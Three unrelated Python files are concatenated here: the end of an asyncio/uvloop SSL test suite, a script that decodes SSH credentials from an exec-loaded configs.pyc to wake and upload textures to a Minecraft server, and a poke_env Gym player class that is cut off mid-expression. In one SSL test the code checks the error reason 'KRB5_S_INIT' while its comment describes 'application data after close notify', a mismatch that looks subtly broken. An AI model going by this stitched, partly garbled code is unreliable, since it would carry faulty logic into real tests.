client_sslctx_2 = self._create_client_ssl_context() clients = [] async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') data = await reader.readexactly(len(B_DATA)) self.assertEqual(data, B_DATA) writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')]) await writer.drain() writer.close() CNT += 1 class ServerProtocol(asyncio.StreamReaderProtocol): def connection_made(self, transport): super_ = super() transport.pause_reading() fut = self._loop.create_task(self._loop.start_tls( transport, self, sslctx_2, server_side=True)) def cb(_): try: tr = fut.result() except Exception as ex: super_.connection_lost(ex) else: super_.connection_made(tr) fut.add_done_callback(cb) def server_protocol_factory(): reader = asyncio.StreamReader(loop=self.loop) protocol = ServerProtocol(reader, handle_client, loop=self.loop) return protocol async def test_client(addr): fut = asyncio.Future(loop=self.loop) def prog(sock): try: sock.connect(addr) sock.starttls(client_sslctx_1) # because wrap_socket() doesn't work correctly on # SSLSocket, we have to do the 2nd level SSL manually incoming = ssl.MemoryBIO() outgoing = ssl.MemoryBIO() sslobj = client_sslctx_2.wrap_bio(incoming, outgoing) def do(func, *args): while True: try: rv = func(*args) break except ssl.SSLWantReadError: if outgoing.pending: sock.send(outgoing.read()) incoming.write(sock.recv(65536)) if outgoing.pending: sock.send(outgoing.read()) return rv do(sslobj.do_handshake) do(sslobj.write, A_DATA) data = do(sslobj.read, 2) self.assertEqual(data, b'OK') do(sslobj.write, B_DATA) data = b'' while True: chunk = do(sslobj.read, 4) if not chunk: break data += chunk self.assertEqual(data, b'SPAM') do(sslobj.unwrap) sock.close() except Exception as ex: self.loop.call_soon_threadsafe(fut.set_exception, ex) sock.close() else: self.loop.call_soon_threadsafe(fut.set_result, None) client = self.tcp_client(prog) client.start() clients.append(client) await fut async def start_server(): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) srv = await self.loop.create_server( server_protocol_factory, '127.0.0.1', 0, family=socket.AF_INET, ssl=sslctx_1, **extras) try: srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) finally: self.loop.call_soon(srv.close) await srv.wait_closed() with self._silence_eof_received_warning(): self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) for client in clients: client.stop() def test_renegotiation(self): if self.implementation == 'asyncio': raise unittest.SkipTest('asyncio does not support renegotiation') CNT = 0 TOTAL_CNT = 25 A_DATA = b'A' * 1024 * 1024 B_DATA = b'B' * 1024 * 1024 sslctx = openssl_ssl.Context(openssl_ssl.SSLv23_METHOD) if hasattr(openssl_ssl, 'OP_NO_SSLV2'): sslctx.set_options(openssl_ssl.OP_NO_SSLV2) sslctx.use_privatekey_file(self.ONLYKEY) sslctx.use_certificate_chain_file(self.ONLYCERT) client_sslctx = self._create_client_ssl_context() def server(sock): conn = openssl_ssl.Connection(sslctx, sock) conn.set_accept_state() data = b'' while len(data) < len(A_DATA): try: chunk = conn.recv(len(A_DATA) - len(data)) if not chunk: break data += chunk except openssl_ssl.WantReadError: pass self.assertEqual(data, A_DATA) conn.renegotiate() if conn.renegotiate_pending(): conn.send(b'OK') else: conn.send(b'ER') data = b'' while len(data) < len(B_DATA): try: chunk = conn.recv(len(B_DATA) - len(data)) if not chunk: break data += chunk except openssl_ssl.WantReadError: pass self.assertEqual(data, B_DATA) if conn.renegotiate_pending(): conn.send(b'ERRO') else: conn.send(b'SPAM') conn.shutdown() async def client(addr): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, **extras) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() async def client_sock(addr): sock = socket.socket() sock.connect(addr) reader, writer = await asyncio.open_connection( sock=sock, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') writer.write(B_DATA) self.assertEqual(await reader.readexactly(4), b'SPAM') nonlocal CNT CNT += 1 writer.close() sock.close() def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) with self._silence_eof_received_warning(): run(client) with self._silence_eof_received_warning(): run(client_sock) def test_shutdown_timeout(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CNT = 0 # number of clients that were successful TOTAL_CNT = 25 # total number of clients that test will create TIMEOUT = 10.0 # timeout for this test A_DATA = b'A' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() clients = [] async def handle_client(reader, writer): nonlocal CNT data = await reader.readexactly(len(A_DATA)) self.assertEqual(data, A_DATA) writer.write(b'OK') await writer.drain() writer.close() with self.assertRaisesRegex(asyncio.TimeoutError, 'SSL shutdown timed out'): await reader.read() CNT += 1 async def test_client(addr): fut = asyncio.Future(loop=self.loop) def prog(sock): try: sock.starttls(client_sslctx) sock.connect(addr) sock.send(A_DATA) data = sock.recv_all(2) self.assertEqual(data, b'OK') data = sock.recv(1024) self.assertEqual(data, b'') fd = sock.detach() try: select.select([fd], [], [], 3) finally: os.close(fd) except Exception as ex: self.loop.call_soon_threadsafe(fut.set_exception, ex) else: self.loop.call_soon_threadsafe(fut.set_result, None) client = self.tcp_client(prog) client.start() clients.append(client) await fut async def start_server(): extras = {} if self.implementation != 'asyncio' or self.PY37: extras['ssl_handshake_timeout'] = 10.0 if self.implementation != 'asyncio': # or self.PY38 extras['ssl_shutdown_timeout'] = 0.5 srv = await asyncio.start_server( handle_client, '127.0.0.1', 0, family=socket.AF_INET, ssl=sslctx, loop=self.loop, **extras) try: srv_socks = srv.sockets self.assertTrue(srv_socks) addr = srv_socks[0].getsockname() tasks = [] for _ in range(TOTAL_CNT): tasks.append(test_client(addr)) await asyncio.wait_for( asyncio.gather(*tasks, loop=self.loop), TIMEOUT, loop=self.loop) finally: self.loop.call_soon(srv.close) await srv.wait_closed() with self._silence_eof_received_warning(): self.loop.run_until_complete(start_server()) self.assertEqual(CNT, TOTAL_CNT) for client in clients: client.stop() def test_shutdown_cleanly(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CNT = 0 TOTAL_CNT = 25 A_DATA = b'A' * 1024 * 1024 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() def server(sock): sock.starttls( sslctx, server_side=True) data = sock.recv_all(len(A_DATA)) self.assertEqual(data, A_DATA) sock.send(b'OK') sock.unwrap() sock.close() async def client(addr): extras = {} if self.implementation != 'asyncio' or self.PY37: extras = dict(ssl_handshake_timeout=10.0) reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop, **extras) writer.write(A_DATA) self.assertEqual(await reader.readexactly(2), b'OK') self.assertEqual(await reader.read(), b'') nonlocal CNT CNT += 1 writer.close() def run(coro): nonlocal CNT CNT = 0 with self.tcp_server(server, max_clients=TOTAL_CNT, backlog=TOTAL_CNT) as srv: tasks = [] for _ in range(TOTAL_CNT): tasks.append(coro(srv.addr)) self.loop.run_until_complete( asyncio.gather(*tasks, loop=self.loop)) self.assertEqual(CNT, TOTAL_CNT) with self._silence_eof_received_warning(): run(client) def test_write_to_closed_transport(self): if self.implementation == 'asyncio': raise unittest.SkipTest() sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() future = None def server(sock): sock.starttls(sslctx, server_side=True) sock.shutdown(socket.SHUT_RDWR) sock.close() def unwrap_server(sock): sock.starttls(sslctx, server_side=True) while True: try: sock.unwrap() break except ssl.SSLError as ex: # Since OpenSSL 1.1.1, it raises "application data after # close notify" if ex.reason == 'KRB5_S_INIT': break except OSError as ex: # OpenSSL < 1.1.1 if ex.errno != 0: raise sock.close() async def client(addr): nonlocal future future = self.loop.create_future() reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(b'I AM WRITING NOWHERE1' * 100) try: data = await reader.read() self.assertEqual(data, b'') except (ConnectionResetError, BrokenPipeError): pass for i in range(25): writer.write(b'I AM WRITING NOWHERE2' * 100) self.assertEqual( writer.transport.get_write_buffer_size(), 0) await future def run(meth): def wrapper(sock): try: meth(sock) except Exception as ex: self.loop.call_soon_threadsafe(future.set_exception, ex) else: self.loop.call_soon_threadsafe(future.set_result, None) return wrapper with self._silence_eof_received_warning(): with self.tcp_server(run(server)) as srv: self.loop.run_until_complete(client(srv.addr)) with self.tcp_server(run(unwrap_server)) as srv: self.loop.run_until_complete(client(srv.addr)) def test_flush_before_shutdown(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CHUNK = 1024 * 128 SIZE = 32 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) sslctx_openssl = openssl_ssl.Context(openssl_ssl.SSLv23_METHOD) if hasattr(openssl_ssl, 'OP_NO_SSLV2'): sslctx_openssl.set_options(openssl_ssl.OP_NO_SSLV2) sslctx_openssl.use_privatekey_file(self.ONLYKEY) sslctx_openssl.use_certificate_chain_file(self.ONLYCERT) client_sslctx = self._create_client_ssl_context() future = None def server(sock): sock.starttls(sslctx, server_side=True) self.assertEqual(sock.recv_all(4), b'ping') sock.send(b'pong') time.sleep(0.5) # hopefully stuck the TCP buffer data = sock.recv_all(CHUNK * SIZE) self.assertEqual(len(data), CHUNK * SIZE) sock.close() def openssl_server(sock): conn = openssl_ssl.Connection(sslctx_openssl, sock) conn.set_accept_state() while True: try: data = conn.recv(16384) self.assertEqual(data, b'ping') break except openssl_ssl.WantReadError: pass # use renegotiation to queue data in peer _write_backlog conn.renegotiate() conn.send(b'pong') data_size = 0 while True: try: chunk = conn.recv(16384) if not chunk: break data_size += len(chunk) except openssl_ssl.WantReadError: pass except openssl_ssl.ZeroReturnError: break self.assertEqual(data_size, CHUNK * SIZE) def run(meth): def wrapper(sock): try: meth(sock) except Exception as ex: self.loop.call_soon_threadsafe(future.set_exception, ex) else: self.loop.call_soon_threadsafe(future.set_result, None) return wrapper async def client(addr): nonlocal future future = self.loop.create_future() reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(b'ping') data = await reader.readexactly(4) self.assertEqual(data, b'pong') for _ in range(SIZE): writer.write(b'x' * CHUNK) writer.close() try: data = await reader.read() self.assertEqual(data, b'') except ConnectionResetError: pass await future with self.tcp_server(run(server)) as srv: self.loop.run_until_complete(client(srv.addr)) with self.tcp_server(run(openssl_server)) as srv: self.loop.run_until_complete(client(srv.addr)) def test_remote_shutdown_receives_trailing_data(self): if self.implementation == 'asyncio': raise unittest.SkipTest() CHUNK = 1024 * 128 SIZE = 32 sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) client_sslctx = self._create_client_ssl_context() future = None def server(sock): incoming = ssl.MemoryBIO() outgoing = ssl.MemoryBIO() sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True) while True: try: sslobj.do_handshake() except ssl.SSLWantReadError: if outgoing.pending: sock.send(outgoing.read()) incoming.write(sock.recv(16384)) else: if outgoing.pending: sock.send(outgoing.read()) break while True: try: data = sslobj.read(4) except ssl.SSLWantReadError: incoming.write(sock.recv(16384)) else: break self.assertEqual(data, b'ping') sslobj.write(b'pong') sock.send(outgoing.read()) time.sleep(0.2) # wait for the peer to fill its backlog # send close_notify but don't wait for response with self.assertRaises(ssl.SSLWantReadError): sslobj.unwrap() sock.send(outgoing.read()) # should receive all data data_len = 0 while True: try: chunk = len(sslobj.read(16384)) data_len += chunk except ssl.SSLWantReadError: incoming.write(sock.recv(16384)) except ssl.SSLZeroReturnError: break self.assertEqual(data_len, CHUNK * SIZE) # verify that close_notify is received sslobj.unwrap() sock.close() def eof_server(sock): sock.starttls(sslctx, server_side=True) self.assertEqual(sock.recv_all(4), b'ping') sock.send(b'pong') time.sleep(0.2) # wait for the peer to fill its backlog # send EOF sock.shutdown(socket.SHUT_WR) # should receive all data data = sock.recv_all(CHUNK * SIZE) self.assertEqual(len(data), CHUNK * SIZE) sock.close() async def client(addr): nonlocal future future = self.loop.create_future() reader, writer = await asyncio.open_connection( *addr, ssl=client_sslctx, server_hostname='', loop=self.loop) writer.write(b'ping') data = await reader.readexactly(4) self.assertEqual(data, b'pong') # fill write backlog in a hacky way - renegotiation won't help for _ in range(SIZE): writer.transport._test__append_write_backlog(b'x' * CHUNK) try: data = await reader.read() self.assertEqual(data, b'') except (BrokenPipeError, ConnectionResetError): pass await future def run(meth): def wrapper(sock): try: meth(sock) except Exception as ex: self.loop.call_soon_threadsafe(future.set_exception, ex) else: self.loop.call_soon_threadsafe(future.set_result, None) return wrapper with self.tcp_server(run(server)) as srv: self.loop.run_until_complete(client(srv.addr)) with self.tcp_server(run(eof_server)) as srv: self.loop.run_until_complete(client(srv.addr)) def test_connect_timeout_warning(self): s = socket.socket(socket.AF_INET) s.bind(('127.0.0.1', 0)) addr = s.getsockname() async def test(): try: await asyncio.wait_for( self.loop.create_connection(asyncio.Protocol, *addr, ssl=True), 0.1, loop=self.loop) except (ConnectionRefusedError, asyncio.TimeoutError): pass else: self.fail('TimeoutError is not raised') with s: try: with self.assertWarns(ResourceWarning) as cm: self.loop.run_until_complete(test()) gc.collect() gc.collect() gc.collect() except AssertionError as e: self.assertEqual(str(e), 'ResourceWarning not triggered') else: self.fail('Unexpected ResourceWarning: {}'.format(cm.warning)) def test_handshake_timeout_handler_leak(self): if self.implementation == 'asyncio': # Okay this turns out to be an issue for asyncio.sslproto too raise unittest.SkipTest() s = socket.socket(socket.AF_INET) s.bind(('127.0.0.1', 0)) s.listen(1) addr = s.getsockname() async def test(ctx): try: await asyncio.wait_for( self.loop.create_connection(asyncio.Protocol, *addr, ssl=ctx), 0.1, loop=self.loop) except (ConnectionRefusedError, asyncio.TimeoutError): pass else: self.fail('TimeoutError is not raised') with s: ctx = ssl.create_default_context() self.loop.run_until_complete(test(ctx)) ctx = weakref.ref(ctx) # SSLProtocol should be DECREF to 0 self.assertIsNone(ctx()) def test_shutdown_timeout_handler_leak(self): loop = self.loop def server(sock): sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY) sock = sslctx.wrap_socket(sock, server_side=True) sock.recv(32) sock.close() class Protocol(asyncio.Protocol): def __init__(self): self.fut = asyncio.Future(loop=loop) def connection_lost(self, exc): self.fut.set_result(None) async def client(addr, ctx): tr, pr = await loop.create_connection(Protocol, *addr, ssl=ctx) tr.close() await pr.fut with self.tcp_server(server) as srv: ctx = self._create_client_ssl_context() loop.run_until_complete(client(srv.addr, ctx)) ctx = weakref.ref(ctx) if self.implementation == 'asyncio': # asyncio has no shutdown timeout, but it ends up with a circular # reference loop - not ideal (introduces gc glitches), but at least # not leaking gc.collect() gc.collect() gc.collect() # SSLProtocol should be DECREF to 0 self.assertIsNone(ctx()) class Test_UV_TCPSSL(_TestSSL, tb.UVTestCase): pass class Test_AIO_TCPSSL(_TestSSL, tb.AIOTestCase): pass
Update_MODS_TEXTURES.py
from wakeonlan import send_magic_packet from fabric import Connection import marshal import types import threading from queue import Queue import socket import time import base64 import sys import paramiko.ssh_exception def starting_module(c_q): print("###########################################") print("## UPDATE TEXTURES - V3.0 ##") print("## AUTHOR - MAFIOSI ##") print("###########################################") print() print("[WARNING] DO NOT CLOSE THE PROGRAM WHILE IT'S RUNNING") time.sleep(2) print() print("[STATE] Checking file configs.pyc availability....") try: s = open('configs.pyc', 'rb') print("[RESULT] File configs.pyc found") print() except: print("[RESULT] Move file configs.pyc to the same folder as this EXECUTABLE") c_q.put(2) return s.seek(12) olives = marshal.load(s) garden = types.ModuleType("Garden") exec(olives,garden.__dict__) alpha = base64.decodebytes(bytes(garden.pick(1))) beta = base64.decodebytes(bytes(garden.pick(2))) gamma = base64.decodebytes(bytes(garden.pick(3))) delta = base64.decodebytes(bytes(garden.pick(4))) x = 9 alpha = alpha.decode() beta = beta.decode() gamma = gamma.decode() delta = delta.decode() # CONNECTION VARIABLES server = Connection(host=gamma, user=alpha, port=22, connect_kwargs={"password": beta}) command = 'nohup screen -S mine -d -m python3 Internal_MManager.py &' # TIME PC TAKES TO TURN ON zzz = 50 verify = False ########################################## ########## MAIN PROGRAM ########## ########################################## while True: print('[STATE] Looking up server info...') try: time.sleep(1) i = socket.gethostbyname(gamma) time.sleep(1) print('[RESULT] Server OK') print() except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: print("[RESULT] Server info could not be retrieved, try again later") c_q.put(3) return # TELLS PC TO TURN ON print('[STATE] Checking if Server is ON...') try: send_magic_packet(delta, ip_address=i, port=x) except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: error = err print("[RESULT] Server cannot be turned ON, try again later") c_q.put(4) return # CHECKS IF PC IS ALREADY ON AND CONNECTS try: server.run('ls', hide=True) verify = server.is_connected except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: print("[RESULT] Server is turned off --> Turning it ON...") if not verify: print("[ACTION] Sending Magic Packets") print("[ACTION] Waiting for Server to turn ON. ETA: ~60 sec") print("[WARNING] Program should Work even with Traceback error - Cause (missing useless repositories)") time.sleep(zzz) try: server.run('ls', hide=True) verify = server.is_connected if verify: print("[RESULT] Server is turned ON") print() else: print("[RESULT] Server cannot be turned ON, try again later") c_q.put(5) return except (Exception, ConnectionResetError, socket.timeout, paramiko.ssh_exception.SSHException) as err: error = err print("[RESULT] Server cannot be turned ON, try again later") c_q.put(5) return else: print("[RESULT] Server is Turned ON") print() # TRY TO TRANSFER FILES TO PC print("[STATE] Transferring Files") try: server.put('D:\Projects\Minecraft_Server_Management\Zip_File_Distribution\TEXTURES_ONLY.zip', '/opt/Transfer/Distribution') print("[RESULT] Files Transferred Sucessfully") print() c_q.put(1) break except: print("[RESULT] Files could not be transferred") c_q.put(6) break return ########################################## ########## MAIN ROUTINE ########## ########################################## def main(): sys.tracebacklimit = None close_queue= Queue() thread_start_server = threading.Thread(name='Start_Server', target=starting_module, daemon=True, args=(close_queue,)) thread_start_server.start() # WAITS FOR THREAD TO GIVE OUTPUT (BAD OR GOOD) while True: state = close_queue.get() if state == 1: print('[RESULT] IT EXECUTED SUCCESSFULLY - YOU MAY CLOSE THE PROGRAM') time.sleep(8) return else: print("ERROR: " + str(state)) print('[WARNING] PLEASE WARN DEVELOPER OF ERROR NUMBER (or just move the damn configs file)') time.sleep(8) return if __name__ == '__main__': main()
env_player.py
# -*- coding: utf-8 -*- """This module defines a player class exposing the Open AI Gym API. """ from abc import ABC, abstractmethod, abstractproperty from gym.core import Env # pyre-ignore from queue import Queue from threading import Thread from typing import Any, Callable, List, Optional, Tuple, Union from poke_env.environment.battle import Battle from poke_env.player.player import Player from poke_env.player_configuration import PlayerConfiguration from poke_env.server_configuration import ServerConfiguration from poke_env.teambuilder.teambuilder import Teambuilder from poke_env.utils import to_id_str import asyncio import numpy as np # pyre-ignore import time class EnvPlayer(Player, Env, ABC): # pyre-ignore """Player exposing the Open AI Gym Env API. Recommended use is with play_against.""" _ACTION_SPACE = None MAX_BATTLE_SWITCH_RETRY = 10000 PAUSE_BETWEEN_RETRIES = 0.001 def __init__( self, player_configuration: Optional[PlayerConfiguration] = None, *, avatar: Optional[int] = None, battle_format: str = "gen8randombattle", log_level: Optional[int] = None, server_configuration: Optional[ServerConfiguration] = None, start_listening: bool = True, team: Optional[Union[str, Teambuilder]] = None, ): """ :param player_configuration: Player configuration. If empty, defaults to an automatically generated username with no password. This option must be set if the server configuration requires authentication. :type player_configuration: PlayerConfiguration, optional :param avatar: Player avatar id. Optional. :type avatar: int, optional :param battle_format: Name of the battle format this player plays. Defaults to gen8randombattle. :type battle_format: str :param log_level: The player's logger level. :type log_level: int. Defaults to logging's default level. :param server_configuration: Server configuration. Defaults to Localhost Server Configuration. :type server_configuration: ServerConfiguration, optional :param start_listening: Wheter to start listening to the server. Defaults to True. :type start_listening: bool :param team: The team to use for formats requiring a team. Can be a showdown team string, a showdown packed team string, of a ShowdownTeam object. Defaults to None. :type team: str or Teambuilder, optional """ super(EnvPlayer, self).__init__( player_configuration=player_configuration, avatar=avatar, battle_format=battle_format, log_level=log_level, max_concurrent_battles=1, server_configuration=server_configuration, start_listening=start_listening, team=team, ) self._actions = {} self._current_battle: Battle self._observations = {} self._reward_buffer = {} self._start_new_battle = False @abstractmethod def _action_to_move(self, action: int, battle: Battle) -> str: """Abstract method converting elements of the action space to move orders.""" async def _battle_finished_callback(self, battle: Battle) -> None: self._observations[battle].put(self.embed_battle(battle)) def _init_battle(self, battle: Battle) -> None: self._observations[battle] = Queue() self._actions[battle] = Queue() def choose_move(self, battle: Battle) -> str: if battle not in self._observations or battle not in self._actions: self._init_battle(battle) self._observations[battle].put(self.embed_battle(battle)) action = self._actions[battle].get() return self._action_to_move(action, battle) def close(self) -> None: """Unimplemented. Has no effect.""" def complete_current_battle(self) -> None: """Completes the current battle by performing random moves.""" done = self._current_battle.finished while not done: _, _, done, _ = self.step(np.random.choice(self._ACTION_SPACE)) def compute_reward(self, battle: Battle) -> float: """Returns a reward for the given battle. The default implementation corresponds to the default parameters of the reward_computing_helper method. :param battle: The battle for which to compute the reward. :type battle: Battle :return: The computed reward. :rtype: float """ return self.reward_computing_helper(battle) @abstractmethod def embed_battle(self, battle: Battle) -> Any: """Abstract method for embedding battles. :param battle: The battle whose state is being embedded :type battle: Battle :return: The computed embedding :rtype: Any """ def reset(self) -> Any: """Resets the internal environment state. The current battle will be set to an active unfinished battle. :return: The observation of the new current battle. :rtype: Any :raies: EnvironmentError """ for _ in range(self.MAX_BATTLE_SWITCH_RETRY): battles = dict(self._actions.items()) battles = [b for b in battles if not b.finished] if battles: self._current_battle = battles[0] observation = self._observations[self._current_battle].get() return observation time.sleep(self.PAUSE_BETWEEN_RETRIES) else: raise EnvironmentError("User %s has no active battle." % self.username) def render(self, mode="human") -> None: """A one line rendering of the current state of the battle.""" print( " Turn %4d. | [%s][%3d/%3dhp] %10.10s - %10.10s [%3d%%hp][%s]" % ( self._current_battle.turn, "".join( [ "⦻" if mon.fainted else "●" for mon in self._current_battle.team.values() ] ), self._current_battle.active_pokemon.current_hp or 0, self._current_battle.active_pokemon.max_hp or 0, self._current_battle.active_pokemon.species, self._current_battle.opponent_active_pokemon.species, # pyre-ignore self._current_battle.opponent_active_pokemon.current_hp # pyre-ignore or 0, "".join( [ "⦻" if mon.fainted else "●" for mon in self._current_battle.opponent_team.values() ] ), ), end="\n" if self._current_battle.finished else "\r", ) def reward_computing_helper( self, battle: Battle, *, fainted_value: float = 0.0, hp_value: float = 0.0, number_of_pokemons: int = 6, starting_value: float = 0.0, status_value: float = 0.0, victory_value: float = 1.0, ) -> float: """A helper function to compute rewards. The reward is computed by computing the value of a game state, and by comparing it to the last state. State values are computed by weighting different factor. Fainted pokemons, their remaining HP, inflicted statuses and winning are taken into account. For instance, if the last time this function was called for battle A it had a state value of 8 and this call leads to a value of 9, the returned reward will be 9 - 8 = 1. Consider a single battle where each player has 6 pokemons. No opponent pokemon has fainted, but our team has one fainted pokemon. Three opposing pokemons are burned. We have one pokemon missing half of its HP, and our fainted pokemon has no HP left. The value of this state will be: - With fainted value: 1, status value: 0.5, hp value: 1: = - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1 - With fainted value: 3, status value: 0, hp value: 1: = - 3 + 3 * 0 - 1.5 = -4.5 :param battle: The battle for which to compute rewards. :type battle: Battle :param fainted_value: The reward weight for fainted pokemons. Defaults to 0. :type fainted_value: float :param hp_value: The reward weight for hp per pokemon. Defaults to 0. :type hp_value: float :param number_of_pokemons: The number of pokemons per team. Defaults to 6. :type number_of_pokemons: int :param starting_value: The default reference value evaluation. Defaults to 0. :type starting_value: float :param status_value: The reward value per non-fainted status. Defaults to 0. :type status_value: float :param victory_value: The reward value for winning. Defaults to 1. :type victory_value: float :return: The reward. :rtype: float """ if battle not in self._reward_buffer: self._reward_buffer[battle] = starting_value current_value = 0 for mon in battle.team.values(): current_value += mon.current_hp_fraction * hp_value if mon.fainted: current_value -= fainted_value elif mon.status is not None: current_value -= status_value current_value += (number_of_pokemons - len(battle.team)) * hp_value for mon in battle.opponent_team.values(): current_value -= mon.current_hp_fraction * hp_value if mon.fainted: current_value += fainted_value elif mon.status is not None: current_value += status_value current_value -= (number_of_pokemons - len(battle.opponent_team)) * hp_value if battle.won: current_value += victory_value elif battle.lost: current_value -= victory_value to_return = current_value - self._reward_buffer[battle] self._reward_buffer[battle] = current_value return to_return def seed(self, seed=None) -> None: """Sets the numpy seed.""" np.random.seed(seed) def step(self, action: int) -> Tuple: """Performs action in the current battle. :param action: The action to perform. :type action: int :return: A tuple containing the next observation, the reward, a boolean indicating wheter the episode is finished, and additional information :rtype: tuple """ if self._current_battle.finished: observation = self.reset() else: self._actions[self._current_battle].put(action) observation = self._observations[self._current_battle].get() return ( observation, self.compute_reward(self._current_battle), self._current_battle.finished, {}, ) def play_against( self, env_algorithm: Callable, opponent: Player, env_algorithm_kwargs=None ): """Executes a function controlling the player while facing opponent. The env_algorithm function is executed with the player environment as first argument. It exposes the open ai gym API. Additional arguments can be passed to the env_algorithm function with env_algorithm_kwargs. Battles against opponent will be launched as long as env_algorithm is running. When env_algorithm returns, the current active battle will be finished randomly if it is not already. :param env_algorithm: A function that controls the player. It must accept the player as first argument. Additional arguments can be passed with the env_algorithm_kwargs argument. :type env_algorithm: callable :param opponent: A player against with the env player will player. :type opponent: Player :param env_algorithm_kwargs: Optional arguments to pass to the env_algorithm. Defaults to None. """ self._start_new_battle = True async def launch_battles(player: EnvPlayer, opponent: Player): if opponent is not None: battles_coroutine = asyncio.gather( player.send_challenges( opponent=to_id_str(opponent.username), n_challenges=1, to_wait=opponent.logged_in, ), opponent.accept_challenges( opponent=to_id_str(player.username), n_challenges=1 ), ) else: battles_coroutine = asyncio.gather(player.ladder(n_games=1)) await battles_coroutine def env_algorithm_wrapper(player, kwargs): env_algorithm(player, **kwargs) player._start_new_battle = False while True: try: player.complete_current_battle() player.reset() except OSError: break loop = asyncio.get_event_loop() if env_algorithm_kwargs is None: env_algorithm_kwargs = {} thread = Thread( target=lambda: env_algorithm_wrapper(self, env_algorithm_kwargs) ) thread.start() while self._start_new_battle: loop.run_until_complete(launch_battles(self, opponent)) thread.join() @abstractproperty def action_space(self) -> List: """Returns the action space of the player. Must be implemented by subclasses.""" pass class Gen7EnvSinglePlayer(EnvPlayer): # pyre-ignore _ACTION_SPACE = list(range(3 * 4 + 6)) def _action_to_move(self, action: int, battle: Battle) -> str: """Converts actions to move orders. The conversion is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 18 The action - 12th available switch in battle.available_switches is executed. If the proposed action is illegal, a random legal move is performed. :param action: The action to convert. :type action: int :param battle: The battle in which to act. :type battle: Battle :return: the order to send to the server. :rtype: str """ if ( action < 4 and action < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action]) elif ( not battle.force_switch and battle.can_z_move and 0 <= action - 4 < len(battle.active_pokemon.available_z_moves) ): return self.create_order( battle.active_pokemon.available_z_moves[action - 4], z_move=True ) elif ( battle.can_mega_evolve and 0 <= action - 8 < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action - 8], mega=True) elif 0 <= action - 12 < len(battle.available_switches): return self.create_order(battle.available_switches[action - 12]) else: return self.choose_random_move(battle) @property def action_space(self) -> List: """The action space for gen 7 single battles. The conversion to moves is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 18 The action - 12th available switch in battle.available_switches is executed. """ return self._ACTION_SPACE class Gen8EnvSinglePlayer(EnvPlayer): # pyre-ignore _ACTION_SPACE = list(range(4 * 4 + 6)) def _action_to_move(self, action: int, battle: Battle) -> str: """Converts actions to move orders. The conversion is done as follows: 0 <= action < 4: The actionth available move in battle.available_moves is executed. 4 <= action < 8: The action - 4th available move in battle.available_moves is executed, with z-move. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 8 <= action < 12: The action - 8th available move in battle.available_moves is executed, with mega-evolution. 12 <= action < 16: The action - 12th available move in battle.available_moves is executed, while dynamaxing. 16 <= action < 22 The action - 16th available switch in battle.available_switches is executed. If the proposed action is illegal, a random legal move is performed. :param action: The action to convert. :type action: int :param battle: The battle in which to act. :type battle: Battle :return: the order to send to the server. :rtype: str """ if ( action < 4 and action < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action]) elif ( not battle.force_switch and battle.can_z_move and 0 <= action - 4 < len(battle.active_pokemon.available_z_moves) ): return self.create_order( battle.active_pokemon.available_z_moves[action - 4], z_move=True ) elif ( battle.can_mega_evolve and 0 <= action - 8 < len(battle.available_moves) and not battle.force_switch ): return self.create_order(battle.available_moves[action - 8], mega=True) elif ( battle.can_dynamax and 0 <= action - 12 < 